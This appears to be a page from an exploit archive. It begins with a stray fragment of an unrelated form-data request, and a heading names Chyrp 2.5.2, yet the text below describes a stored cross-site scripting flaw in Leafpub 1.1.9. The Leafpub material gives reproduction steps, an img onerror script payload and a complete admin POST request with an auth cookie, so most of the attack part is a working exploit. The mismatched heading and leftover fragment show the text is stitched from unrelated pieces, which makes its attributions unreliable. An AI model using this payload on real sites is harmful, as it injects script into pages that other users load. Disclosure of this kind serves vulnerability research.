name="feather"text-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="hash"11e11aba15114f918ec1c2e6b8f8ddcf-----------------------------28307567523233313132815561598--

Chyrp 2.5.2 Cross Site Scripting

Leafpub version 1.1.9 suffers from a persistent cross site scripting vulnerability.

    # Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/Leafpub# Software Link: https://github.com/Leafpub/leafpub# Version: 1.1.9# Tested on: MacOS### Steps to Reproduce ###- Please login from this address: http://localhost/leafpub/admin/login- Click on the Settings > Advanced- Enter the following payload into the "Custom Code" area and save it: ("><imgsrc=x onerror=alert("Stored")>)- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /leafpub/api/settings HTTP/1.1Host: localhostCookie:authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwloUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 476Origin: http://localhostReferer: http://localhost/leafpub/admin/settingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closetitle=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on

Tag

#intel